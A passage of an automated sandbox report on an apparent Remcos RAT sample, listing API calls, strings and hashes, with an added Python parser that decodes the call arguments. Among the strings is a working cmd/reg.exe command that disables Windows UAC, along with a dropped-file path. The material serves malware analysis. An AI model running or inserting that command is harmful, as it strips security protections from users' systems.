                                                                                                                                                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041D580
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                    • String ID: 0$MsgWindowClass
                                                                                                                                                                    • API String ID: 2877667751-2410386613
                                                                                                                                                                    • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                                                                                                                    • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                                                                                                                                                    • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                                                                                                                    • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004077AA
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004077AF
                                                                                                                                                                    Strings
                                                                                                                                                                    • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                                                                                                                                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$CreateProcess
                                                                                                                                                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                    • API String ID: 2922976086-4183131282
                                                                                                                                                                    • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                                                                                                                    • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                                                                                                                                                    • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                                                                                                                    • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    • C:\Users\Public\Libraries\lhgtogaW.pif, xrefs: 004076C4
                                                                                                                                                                    • Rmc-V052BG, xrefs: 004076DA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: C:\Users\Public\Libraries\lhgtogaW.pif$Rmc-V052BG
                                                                                                                                                                    • API String ID: 0-1945959475
                                                                                                                                                                    • Opcode ID: ba7a0da6d6d8a9377fe19e34afbb78340df493f1225962a1f6fa7fa9e137973f
                                                                                                                                                                    • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                                                                                                                                                    • Opcode Fuzzy Hash: ba7a0da6d6d8a9377fe19e34afbb78340df493f1225962a1f6fa7fa9e137973f
                                                                                                                                                                    • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                    • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                                                                                                                    • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                                                                                                                                                    • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                                                                                                                    • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,274C4AEA,?,?,274C4A8A,?,274D2238,0000000C,274C4BBD,00000000,00000000), ref: 274C4B59
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 274C4B6C
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,274C4AEA,?,?,274C4A8A,?,274D2238,0000000C,274C4BBD,00000000,00000000,00000001,274C2082), ref: 274C4B8F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                    • Opcode ID: 909ecdd7557438175394d0c0cdbcd0286df6ccc2b9432207e9030099a661d486
                                                                                                                                                                    • Instruction ID: 6dbc0e1557c8c53425bdc391f82bf77ef4de551b2e437b016b7454dacbe75297
                                                                                                                                                                    • Opcode Fuzzy Hash: 909ecdd7557438175394d0c0cdbcd0286df6ccc2b9432207e9030099a661d486
                                                                                                                                                                    • Instruction Fuzzy Hash: 11F03135900108FBDB119F96C909BEDBFB9EF44665F40416CE905A6250EF399981CA51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                                                                                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                    • String ID: KeepAlive | Disabled
                                                                                                                                                                    • API String ID: 2993684571-305739064
                                                                                                                                                                    • Opcode ID: 17bfdc88350a56738500cb661d506395563dca3eea58109498aa24bd4a02de42
                                                                                                                                                                    • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                                                                                                                                                    • Opcode Fuzzy Hash: 17bfdc88350a56738500cb661d506395563dca3eea58109498aa24bd4a02de42
                                                                                                                                                                    • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
• PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
• Sleep.KERNEL32(00002710), ref: 0041AE07
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered
• API String ID: 614609389-2816303416
• Opcode ID: 8320d0a8477b2dfdf5ffede3a6159dd71cddf314a322f93aa69cf56e5021b822
• Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
• Opcode Fuzzy Hash: 8320d0a8477b2dfdf5ffede3a6159dd71cddf314a322f93aa69cf56e5021b822
• Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
• GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
• SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
Strings
• ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Console$AttributeText$BufferHandleInfoScreen
• String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
• API String ID: 3024135584-2418719853
• Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
• Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
• Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
• Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
• Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
• Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
• Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
• _free.LIBCMT ref: 00444E06
• _free.LIBCMT ref: 00444E1D
• _free.LIBCMT ref: 00444E3C
• _free.LIBCMT ref: 00444E57
• _free.LIBCMT ref: 00444E6E
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: _free$AllocateHeap
• String ID:
• API String ID: 3033488037-0
• Opcode ID: d775a197f71d536e5d52874a7a30662ad33d8ad4d8240f212ad1ffb4432d1cba
• Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
• Opcode Fuzzy Hash: d775a197f71d536e5d52874a7a30662ad33d8ad4d8240f212ad1ffb4432d1cba
• Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
• Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
• CloseHandle.KERNEL32(00000000), ref: 0040FB05
  • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
  • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• String ID:
• API String ID: 2180151492-0
• Opcode ID: 1cedd583b9f178e593e3ec917ceb522a4c434ac57ce81cfb097246834ccbafe2
• Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
• Opcode Fuzzy Hash: 1cedd583b9f178e593e3ec917ceb522a4c434ac57ce81cfb097246834ccbafe2
• Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
Uniqueness

Uniqueness Score: -1.00%
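The function entries above record each routine's imports with raw hexadecimal arguments, and reading them means decoding those constants by hand. In the process-enumeration entry, CreateToolhelp32Snapshot(00000002) is TH32CS_SNAPPROCESS, and the two OpenProcess calls reached through subcall 0041C1DD request 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) and 0x400 (PROCESS_QUERY_INFORMATION): query-only rights with no PROCESS_VM_WRITE or PROCESS_CREATE_THREAD, so this routine walks the process list and classifies each entry (IsWow64Process per process) rather than injecting into it. In the alarm entry, Sleep(00002710) is 10000 ms between the two PlaySoundW calls next to the "Alarm triggered" string. In the banner entry, SetConsoleTextAttribute(..., 0000000C) is FOREGROUND_RED | FOREGROUND_INTENSITY, and GetStdHandle(000000F5) reads as STD_OUTPUT_HANDLE (-11) printed with only its low byte. The parser below is an added example and is not part of the Joe Sandbox report or its IDA plugin; it turns these API lines into structured records and decodes the arguments. The constant tables are the documented Win32 values; sign-extending a lone 000000F5 to -11 is an assumption about how the plugin renders negative DWORDs, and the sample input is copied from the three entries named above.

```python
"""Decode the 'APIs' lines of a Joe Sandbox function-analysis entry.

Added example, not part of the report or of the Joe Sandbox IDA plugin."""
import re
from dataclasses import dataclass, field
from typing import Optional

# "• [Part of subcall function CALLER: ]API.MODULE[(args)][,] ref: ADDR"
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

PROCESS_ACCESS = {  # OpenProcess dwDesiredAccess bits (documented Win32 values)
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
TH32CS = {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS", 0x4: "TH32CS_SNAPTHREAD",
          0x8: "TH32CS_SNAPMODULE", 0x10: "TH32CS_SNAPMODULE32"}
CONSOLE_ATTR = {0x1: "FOREGROUND_BLUE", 0x2: "FOREGROUND_GREEN", 0x4: "FOREGROUND_RED",
                0x8: "FOREGROUND_INTENSITY", 0x10: "BACKGROUND_BLUE", 0x20: "BACKGROUND_GREEN",
                0x40: "BACKGROUND_RED", 0x80: "BACKGROUND_INTENSITY"}
STD_HANDLES = {-10: "STD_INPUT_HANDLE", -11: "STD_OUTPUT_HANDLE", -12: "STD_ERROR_HANDLE"}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                                   # call-site address in the dump
    args: list = field(default_factory=list)   # int, None for '?', or a str
    caller: Optional[int] = None               # set on "Part of subcall" lines
    decoded: dict = field(default_factory=dict)


def flags_to_names(value: int, table: dict) -> str:
    """Render a bitmask as 'A | B', keeping any bits the table does not know."""
    names = [name for bit, name in table.items() if value & bit]
    unknown = value & ~sum(table)
    if unknown:
        names.append(f"0x{unknown:X}")
    return " | ".join(names) if names else "0"


def to_signed32(value: int) -> int:
    # Assumption: '000000F5' is -11 with only its low byte preserved, so a lone
    # high byte is sign-extended just like a full 32-bit value.
    if 0x80 <= value < 0x100:
        return value - 0x100
    return value - (1 << 32) if value >= (1 << 31) else value


def decode_args(call: ApiCall) -> dict:
    a = call.args
    if call.api == "OpenProcess" and a and isinstance(a[0], int):
        return {"dwDesiredAccess": flags_to_names(a[0], PROCESS_ACCESS)}
    if call.api == "CreateToolhelp32Snapshot" and a and isinstance(a[0], int):
        return {"dwFlags": flags_to_names(a[0], TH32CS)}
    if call.api == "Sleep" and a and isinstance(a[0], int):
        return {"dwMilliseconds": f"{a[0]} ms ({a[0] / 1000:g} s)"}
    if call.api == "SetConsoleTextAttribute" and len(a) > 1 and isinstance(a[1], int):
        return {"wAttributes": flags_to_names(a[1], CONSOLE_ATTR)}
    if call.api == "GetStdHandle" and a and isinstance(a[0], int):
        return {"nStdHandle": STD_HANDLES.get(to_signed32(a[0]), f"0x{a[0]:X}")}
    return {}


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if not m:
        return None           # a heading, a string xref, or a dump-source line
    args = []
    for tok in (m["args"] or "").split(","):
        tok = tok.strip()
        if not tok:
            continue
        args.append(None if tok == "?" else int(tok, 16) if HEX8.match(tok) else tok)
    call = ApiCall(m["api"], m["module"], int(m["ref"], 16), args,
                   int(m["caller"], 16) if m["caller"] else None)
    call.decoded = decode_args(call)
    return call


def parse_block(text: str) -> list:
    return [c for c in map(parse_api_line, text.splitlines()) if c]


# Input copied from the report entries above (process enumeration, alarm, banner).
SAMPLE = """
• Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
• Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
• Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
• Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
• Sleep.KERNEL32(00002710), ref: 0041AE07
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
• _free.LIBCMT ref: 00444E06
"""

if __name__ == "__main__":
    for c in parse_block(SAMPLE):
        via = f"via {c.caller:08X}" if c.caller is not None else "direct"
        print(f"{c.ref:08X} {c.api}.{c.module} ({via}) {c.decoded}")
```

Running the module prints one line per call with the decoded argument beside the call-site address. A `None` argument is one the plugin printed as `?` (not recoverable from the trace), a string such as `WinDir` is kept as-is, and the caller address on "Part of subcall" lines is retained so a call can be attributed to the right subroutine inside the 00400000-based dump of process 4. Bits that the tables do not know are left as a hex remainder rather than silently dropped, which is the behaviour you want when a mask carries an undocumented or vendor-specific flag.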

APIs
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
• Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
• Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
• Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
• __alloca_probe_16.LIBCMT ref: 004511B1
• MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
• GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
• __freea.LIBCMT ref: 0045121D
  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
• String ID:
• API String ID: 313313983-0
• Opcode ID: 176232f54f3ec98bfb029651777c0c6490447229ae5715771154ed3ce12be0f5
• Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
• Opcode Fuzzy Hash: 176232f54f3ec98bfb029651777c0c6490447229ae5715771154ed3ce12be0f5
                                                                                                                                                                    • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0044F363
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
• _free.LIBCMT ref: 0044F3BF
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
Memory Dump Source
